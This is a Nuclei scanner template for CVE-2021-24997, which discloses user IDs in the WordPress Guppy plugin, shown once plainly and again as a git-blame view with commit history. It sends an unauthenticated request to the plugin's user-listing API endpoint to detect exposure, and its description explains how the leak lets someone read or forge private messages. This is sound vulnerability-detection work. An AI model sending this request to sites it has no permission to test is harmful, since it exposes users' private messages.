nuclei-templates/cves/2021/CVE-2021-24997.yaml

id: CVE-2021-24997

info:
  name: Wordpress Guppy <=1.1 - User ID Disclosure
  author: Evan Rubinstein
  description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information to make API requests to either get messages sent between users, or send messages posing as one user to another.
  reference:
    - https://www.exploit-db.com/exploits/50540
    - https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24997
  classification:
    cvss-score: 5.4
    cve-id: CVE-2021-24997
    cwe-id: CWE-200
  tags: wordpress,guppy,api,cve2021,cve,wp-plugin

requests:
  - method:
    path:
      - "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '"guppyUsers":'
          - '"userId":'
          - '"type":'
        condition: and
Added CVE-2021-24997 (#3298) * Added CVE-39226 * Added CVE-39226 * Delete CVE-39226.yaml * Renamed CVE-39226 to CVE-2021-39226 Fixed naming error * Added Wp-Guppy-Information-Disclosure template * Removed File Found better descriptor * Added CVE-2021-24997 Added WordPress Guppy Information Disclosure CVE * Fixed CVE-2021-24997 Fixed YAML formatting * Fixed Typo URL Path had an extra double quote * Auto Generated Templates Stats [Wed Dec 8 23:07:24 UTC 2021] :robot: * Deleted Blank Space * Update CVE-2021-24997.yaml * Update CVE-2021-24997.yaml * Update CVE-2021-24997.yaml * Update CVE-2021-24997.yaml * Added CVE-2021-43496 * Update CVE-2021-43496.yaml * fix: syntax update * Added New Vuln * Update CVE-2021-24997.yaml * Update CVE-2021-43496.yaml * Update and rename hd-netowrk-realtime-monitor-system-LFI.yaml to hdnetwork-realtime-lfi.yaml * fix: lints update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: GitHub Action <action@github.com> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2021-12-13 20:52:26 +00:00			`id: CVE-2021-24997`

			`info:`
Many title clean-ups for more standardization. Some vendor name clean-up 2022-05-13 17:22:26 +00:00			`name: Wordpress Guppy <=1.1 - User ID Disclosure`
Added CVE-2021-24997 (#3298) * Added CVE-39226 * Added CVE-39226 * Delete CVE-39226.yaml * Renamed CVE-39226 to CVE-2021-39226 Fixed naming error * Added Wp-Guppy-Information-Disclosure template * Removed File Found better descriptor * Added CVE-2021-24997 Added WordPress Guppy Information Disclosure CVE * Fixed CVE-2021-24997 Fixed YAML formatting * Fixed Typo URL Path had an extra double quote * Auto Generated Templates Stats [Wed Dec 8 23:07:24 UTC 2021] :robot: * Deleted Blank Space * Update CVE-2021-24997.yaml * Update CVE-2021-24997.yaml * Update CVE-2021-24997.yaml * Update CVE-2021-24997.yaml * Added CVE-2021-43496 * Update CVE-2021-43496.yaml * fix: syntax update * Added New Vuln * Update CVE-2021-24997.yaml * Update CVE-2021-43496.yaml * Update and rename hd-netowrk-realtime-monitor-system-LFI.yaml to hdnetwork-realtime-lfi.yaml * fix: lints update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: GitHub Action <action@github.com> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2021-12-13 20:52:26 +00:00			`author: Evan Rubinstein`
Many title clean-ups for more standardization. Some vendor name clean-up 2022-05-13 17:22:26 +00:00			`description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information to make API requests to either get messages sent between users, or send messages posing as one user to another.`
Added CVE-2021-24997 (#3298) * Added CVE-39226 * Added CVE-39226 * Delete CVE-39226.yaml * Renamed CVE-39226 to CVE-2021-39226 Fixed naming error * Added Wp-Guppy-Information-Disclosure template * Removed File Found better descriptor * Added CVE-2021-24997 Added WordPress Guppy Information Disclosure CVE * Fixed CVE-2021-24997 Fixed YAML formatting * Fixed Typo URL Path had an extra double quote * Auto Generated Templates Stats [Wed Dec 8 23:07:24 UTC 2021] :robot: * Deleted Blank Space * Update CVE-2021-24997.yaml * Update CVE-2021-24997.yaml * Update CVE-2021-24997.yaml * Update CVE-2021-24997.yaml * Added CVE-2021-43496 * Update CVE-2021-43496.yaml * fix: syntax update * Added New Vuln * Update CVE-2021-24997.yaml * Update CVE-2021-43496.yaml * Update and rename hd-netowrk-realtime-monitor-system-LFI.yaml to hdnetwork-realtime-lfi.yaml * fix: lints update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: GitHub Action <action@github.com> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2021-12-13 20:52:26 +00:00			`reference:`
			`- https://www.exploit-db.com/exploits/50540`
			`- https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-24997`
			`classification:`
			`cvss-score: 5.4`
			`cve-id: CVE-2021-24997`
			`cwe-id: CWE-200`
			`tags: wordpress,guppy,api,cve2021,cve,wp-plugin`

			`requests:`
			`- method:`
			`path:`
			`- "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`part: body`
			`words:`
			`- '"guppyUsers":'`
			`- '"userId":'`
			`- '"type":'`
Many title clean-ups for more standardization. Some vendor name clean-up 2022-05-13 17:22:26 +00:00			`condition: and`